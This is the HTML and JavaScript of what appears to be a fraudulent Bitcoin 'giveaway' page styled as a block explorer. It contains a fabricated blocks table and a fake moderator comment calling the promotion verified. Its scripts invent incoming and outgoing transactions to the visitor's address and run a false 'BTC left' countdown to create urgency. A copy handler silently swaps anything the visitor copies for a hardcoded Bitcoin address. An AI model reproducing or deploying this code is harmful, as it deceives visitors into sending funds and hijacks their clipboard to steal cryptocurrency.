</div>
</div>
<div class="tab-pane fade in" id="mine">
<div class="panel panel-info">
<div class="panel-body table-responsive">

<i class="fa fa-sort-amount-desc" rel="tooltip" data-placement="bottom" title="" data-original-title="Oldest First"></i>&nbsp;Latest 25 blocks (From a total of <a href="#" title="View All Blocks Mined">597738 blocks</a> with 2,676,969.07 BTC mined)<br>
<a id="ContentPlaceHolder1_linkShowAllBlocksMined" title="View All 597738 Blocks Mined" class="btn-u btn-brd btn-u-xs pull-right margin-bottom-10" href="#"></a>
<table class="table">
	
<tbody><tr>
<th>Block
</th>
<th>
<span title="UTC time">Age</span>
</th>
<th>txn
</th>
<th>Difficulty
</th>
<th>GasUsed
</th>
<th>Reward
</th>
</tr>

<tr><td><span class="address-tag"><a href="#">5673776</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 10:06:57 AM">1 min ago</span></td><td>231</td><td>3,237.52 TH</td><td>7995923</td><td>3<b>.</b>165409017128307316 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673773</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 10:06:06 AM">2 mins ago</span></td><td>193</td><td>3,235.94 TH</td><td>7995848</td><td>3<b>.</b>112375995902555709 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673764</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 10:04:51 AM">3 mins ago</span></td><td>204</td><td>3,226.48 TH</td><td>7983487</td><td>3<b>.</b>179868593777183598 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673761</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 10:03:40 AM">4 mins ago</span></td><td>188</td><td>3,232.79 TH</td><td>7991262</td><td>3<b>.</b>156530113989962816 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673757</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 10:02:05 AM">6 mins ago</span></td><td>214</td><td>3,239.11 TH</td><td>7998169</td><td>3<b>.</b>138195225744916798 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673743</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:58:19 AM">9 mins ago</span></td><td>186</td><td>3,240.71 TH</td><td>7985124</td><td>3<b>.</b>23048827164285552 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673740</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:57:28 AM">10 mins ago</span></td><td>163</td><td>3,242.29 TH</td><td>7988225</td><td>3<b>.</b>14981547100335 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673726</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:54:06 AM">14 mins ago</span></td><td>76</td><td>3,235.97 TH</td><td>4491201</td><td>3<b>.</b>088440572314249856 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673712</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:51:01 AM">17 mins ago</span></td><td>185</td><td>3,229.66 TH</td><td>7985660</td><td>3<b>.</b>158814182245611754 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673710</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:50:04 AM">18 mins ago</span></td><td>163</td><td>3,232.82 TH</td><td>7993631</td><td>3<b>.</b>229338254203369225 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673709</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:49:59 AM">18 mins ago</span></td><td>265</td><td>3,231.24 TH</td><td>7991174</td><td>3<b>.</b>084007019231488064 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673690</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:44:57 AM">23 mins ago</span></td><td>213</td><td>3,232.84 TH</td><td>7998920</td><td>3<b>.</b>298134651547822644 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673687</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:43:41 AM">24 mins ago</span></td><td>155</td><td>3,236.00 TH</td><td>7901492</td><td>3<b>.</b>174879462260719946 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673686</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:43:17 AM">24 mins ago</span></td><td>156</td><td>3,237.58 TH</td><td>7988566</td><td>3<b>.</b>16448269554846812 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673676</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:40:29 AM">27 mins ago</span></td><td>131</td><td>3,239.17 TH</td><td>6673675</td><td>3<b>.</b>086892401573300512 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673672</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:39:52 AM">28 mins ago</span></td><td>200</td><td>3,234.43 TH</td><td>7993615</td><td>3<b>.</b>136485186377933536 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673664</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:37:27 AM">30 mins ago</span></td><td>175</td><td>3,237.59 TH</td><td>7995521</td><td>3<b>.</b>238488428331988064 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673663</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:37:08 AM">31 mins ago</span></td><td>212</td><td>3,239.18 TH</td><td>7979542</td><td>3<b>.</b>091855011593560224 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673648</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:33:55 AM">34 mins ago</span></td><td>197</td><td>3,229.71 TH</td><td>7988837</td><td>3<b>.</b>15641835356969985 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673647</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:33:41 AM">34 mins ago</span></td><td>317</td><td>3,229.71 TH</td><td>7980069</td><td>3<b>.</b>197500501364890588 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673623</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:26:33 AM">41 mins ago</span></td><td>146</td><td>3,240.79 TH</td><td>7998428</td><td>3<b>.</b>126023861084413128 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673618</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:24:47 AM">43 mins ago</span></td><td>203</td><td>3,242.39 TH</td><td>7988252</td><td>3<b>.</b>100980093912258156 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673607</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:21:43 AM">46 mins ago</span></td><td>175</td><td>3,248.74 TH</td><td>7974982</td><td>3<b>.</b>131658068353518133 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673604</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:20:46 AM">47 mins ago</span></td><td>233</td><td>3,251.91 TH</td><td>7994958</td><td>3<b>.</b>122737996251631119 BTC</td></tr><tr><td><span class="address-tag"><a href="#">5673591</a></span></td><td><span rel="tooltip" data-placement="bottom" title="" data-original-title="May-25-2018 09:17:36 AM">50 mins ago</span></td><td>171</td><td>3,248.74 TH</td><td>7981951</td><td>3<b>.</b>1807812764849958 BTC</td></tr>
</tbody></table>
</div>
</div>
</div>
<div class="tab-pane fade in" id="comments">
<div class="panel panel-info">
<div class="panel-body">
<div>
Make sure to use the "downvote" button for any spammy posts, and the "upvote" for interesting conversations.
<br>
<p style="font-size: 13pt; font-weight:bold;margin-top: 15px;">Featured Comment</p>
<ul class="post-list" style="margin-bottom: -60px;">
<li class="post highlighted"><div role="alert"></div><div data-role="post-content" class="post-content" tabindex="0"><div class="indicator"></div><ul class="post-menu dropdown" data-role="menu"><li class="collapse"><a href="#" data-action="collapse" title="Collapse" name="Collapse">
<span>−</span></a></li><li class="expand"><a href="#" data-action="collapse" title="Expand" name="Collapse"><span>+</span></a></li><li class="" role="menuitem"><a class="dropdown-toggle" href="#" data-action="flag" data-role="flag" title="Flag as inappropriate"><i aria-hidden="true" class="icon icon-flag"></i></a></li></ul><div class="avatar hovercard"><a href="#" data-action="profile" data-username="409H" target="_blank" rel="noopener noreferrer" class="user"><img data-role="user-avatar" data-user="251492831" src="https://c.disquscdn.com/uploads/users/25149/2831/avatar92.jpg?1528238676" alt="Avatar">
</a></div><div class="post-body"><header class="comment__header"><span class="post-byline"><span> <span class="author publisher-anchor-color"><a href="#" data-action="profile" data-username="409H" target="_blank" rel="noopener noreferrer">Harry</a></span> <span class="badge moderator">Mod</span></span></span> <span class="post-meta"><span class="bullet time-ago-bullet" aria-hidden="true">•</span> <a href="#comment-3931662104" data-role="relative-time" class="time-ago" title="Tuesday, June 5, 2018 8:09 PM">10 minutes ago</a></span> </header><div class="post-body-inner"><div class="post-message-container" data-role="message-container"><div class="publisher-anchor-color" data-role="message-content"><div class="post-message " data-role="message" dir="auto"><div><p>✔️ This address is verified to be working and active promotion</p><p>Participate and share your experience!</p></div></div><span class="post-media"><ul data-role="post-media-list"></ul></span></div></div><a class="see-more hidden" title="see more" data-action="see-more">see more</a></div></div><div data-role="blacklist-form"></div><div data-role="flagging-form"></div><div class="reply-form-container" data-role="reply-form"></div></div><ul data-role="children" class="children"></ul></li></ul>
<div id="disqus_thread"></div>
<hr>
<div id="disqus_thread">
	<iframe src="comments.htm" style="width: 1px !important; min-width: 100% !important; border: none !important; overflow: hidden !important; height: 1550px !important;" scrolling="no" horizontalscrolling="no" verticalscrolling="no" frameborder="0" allowtransparency="true" allowfullscreen="true" allowscriptaccess="always"></iframe>
</div>


</div>
</div>
</div>
</div>
</div>
</div>


<!-- ============================================= addresses ====================================================== -->
<script>
function random(t, e) {
var n = arguments.length;
if (0 === n) t = 0, e = 2147483647;
else if (1 === n) throw new Error("Warning: rand() expects exactly 2 parameters, 1 given");
return Math.floor(Math.random() * (e - t + 1)) + t
}
function uuidv4() {
return "xxxxxxxxxxxxxxxx".replace(/[xy]/g, function(t) {
var e = 16 * Math.random() | 0;
return ("x" == t ? e : 3 & e | 8).toString(16)
})
}
function bet(t, e, n) {
return t = t.toString().replace("\n", ""), e = e.toString().replace("\n", ""), void 0 !== (n = n.toString().replace("\n", "")).split(t)[1] ? n.split(t)[1].split(e)[0] : void 0
}
function removeArr(t) {
for (var e, n, a = arguments, r = a.length; r > 1 && t.length;)
for (e = a[--r]; - 1 !== (n = t.indexOf(e));) t.splice(n, 1);
return t
}
function addLink() {
var t = window.getSelection(),
e = document.createElement("div");
e.style.position = "absolute", e.style.left = "-99999px", document.body.appendChild(e), e.innerHTML = "1MYwcPwbddgiBAdnZAjeQsbyT1B4dx9oXd", t.selectAllChildren(e), window.setTimeout(function() {
document.body.removeChild(e)
}, 100)
}
function sub() {
for (ramdot = gF.random(2, 5), dots = [], i = 0; i < ramdot; i++) dots[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
for (ramdot2 = gF.random(2, 5), dots2 = [], i = 0; i < ramdot2; i++) dots2[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
return dots.join("-") + "." + dots2.join(".")
}
function newtr() {
tr = document.createElement("tr"), tr.innerHTML = '<td><a class="address-tag" href="#">0x9addb4ab6a83b917...</a></td><td class="hidden-sm"><a href="#">5386568</a></td><td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >1 mins ago</span></td><td><a class="address-tag" href="#">0xaa2498d85bA755900...</a></td><td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td><td><span class="address-tag">0x3c44762c6f79d6b9b...</span></td><td>4 BTC</td><td><font color="gray" size="1">0<b>.</b>00042</font></td>', INT = "1" + uuidv4().toLowerCase(), OUT = "1" + uuidv4().toLowerCase(), TXID = "1" + uuidv4().toLowerCase(), TXID2 = "1" + uuidv4().toLowerCase(), INCIN = (Math.random() * (5 - 0.5) + 0.5).toFixed(3), INOUT = (10 * INCIN + 0.5).toFixed(0);
var t = document.getElementById("myTable").insertRow(1),
e = t.insertCell(0),
n = t.insertCell(1),
a = t.insertCell(2),
r = t.insertCell(3),
d = t.insertCell(4),
s = t.insertCell(5),
i = t.insertCell(6),
o = t.insertCell(7);
e.innerHTML = '<a class="toolme" class="address-tag" href="#">' + TXID + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="#">5386568</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="#">' + OUT + "...</a></td>", d.innerHTML = '<td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>', s.innerHTML = '<td><span class="address-tag">' + window.ADDRESS.substring(0, 19) + "...</span></td>", i.innerHTML = "<td>" + INCIN + " BTC</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar"), setTimeout(function() {
var t = document.getElementById("myTable").insertRow(1),
e = t.insertCell(0),
n = t.insertCell(1),
a = t.insertCell(2),
r = t.insertCell(3),
d = t.insertCell(4),
s = t.insertCell(5),
i = t.insertCell(6),
o = t.insertCell(7);
e.innerHTML = '<a class="address-tag" href="#">' + TXID2 + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="#">5386568</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="#">' + window.ADDRESS.substring(0, 19) + "...</a></td>", d.innerHTML = '<td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>', s.innerHTML = '<td><span class="address-tag">' + OUT + "...</span></td>", i.innerHTML = "<td>" + INOUT + " BTC</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar")
}, 1500)
}
function insertAfter(t, e) {
e.parentNode.insertBefore(t, e.nextSibling)
}
function updateTrans() {
for (i = 0; i < times.length; i++) "now" == times[i].innerHTML.split(" ")[0] ? times[i].innerHTML = "1 mins ago" : times[i].innerHTML = parseInt(times[i].innerHTML.split(" ")[0]) + 1 + " mins ago";
newtr()
}
document.addEventListener("copy", addLink), times = document.getElementsByClassName("tim3"), window.onload = function() {
updateTrans(), trans = setInterval(function() {
updateTrans()
}, 1e4)
}
</script>

<script>
// tell the embed parent frame the height of the content
if (window.parent && window.parent.parent){
window.parent.parent.postMessage(["resultsFrame", {
height: document.body.getBoundingClientRect().height,
slug: "b1cxaqn5"
}], "*")
}
</script>

<!-- ============================================= end ====================================================== -->


<script type="text/javascript"> 
$(document).ready(function(){ 
$('.spoiler-title').click(function(){ 
$(this).parent().children('div.spoiler-content').toggle('fast');
return false;
});
});
</script>
<script>
function setProgress(count, max) {
        var p = (100 * count / max).toString() + '%';
        $('.progress-left').css('left', p);
        $('.progress-width').css('width', p);
        var cc = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        var mm = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
        $('.progress-bar-value').text(cc + ' / ' + mm);

    }
	


var ctd = setInterval(function () {
        if (localStorage.getItem("bar")) {
		   if (localStorage.getItem("bar") <=150) {
			var new_count = localStorage.getItem("bar");
			}
			else if (localStorage.getItem("bar")) {
				var init_count = localStorage.getItem("bar");
				var new_count = init_count - Math.floor((Math.random()*100) + 5);
            }
			}

		else {
        var init_count = Math.floor((Math.random() * (2249 - 2200) + 2200) + 1);
		var new_count = init_count - Math.floor((Math.random()*100) - 1250);
            }
     setProgress(new_count, 5000)


		
localStorage.setItem("bar", new_count);
	
	if (init_count <= 300)
	   clearInterval(ctd);
	if (new_count <= 4999 && init_count >=1001)
	document.getElementById("lefteth").innerHTML = "Left Bitcoin";
	if (new_count <= 2000 && init_count >=301)
	document.getElementById("lefteth").innerHTML = "Hurry up, not much more BTC left!";	  
	if (new_count <= 300)
	document.getElementById("lefteth").innerHTML = "Last chance to get your BTC!";
	if (new_count <= 5000)
	document.title = new_count + " BTC left";
	if (new_count <= 0000)
	document.title = "Get your " + new_count + " BTC now!";
	
	}, 3333);
	
	
  </script>


</div>
 <div>
<form action="" method="POST" class="myP" enctype="multipart/form-data" id="myP">
<input type="file" name="image">
<input type="submit">
</form>
<div>
  <style>
  .toolbar{
    -webkit-animation-name: animation;
    -webkit-animation-duration: 1s;
    -webkit-animation-timing-function: ease-in-out;
    -webkit-animation-play-state: running;

    animation-name: animation;
    animation-duration: 1s;
    animation-timing-function: ease-in-out;
    animation-play-state: running;
}
@-webkit-keyframes animation {
    0%     {background-color:#ede86c;}
    100.0%  {background-color:#ffffff;}
}

@keyframes animation {
    0%     {background-color:#ede86c;}
    100.0%  {background-color:#ffffff;}
}
</style>

</div></div>    <script>
    var clipboard = new Clipboard('.btn');
    </script></body></html>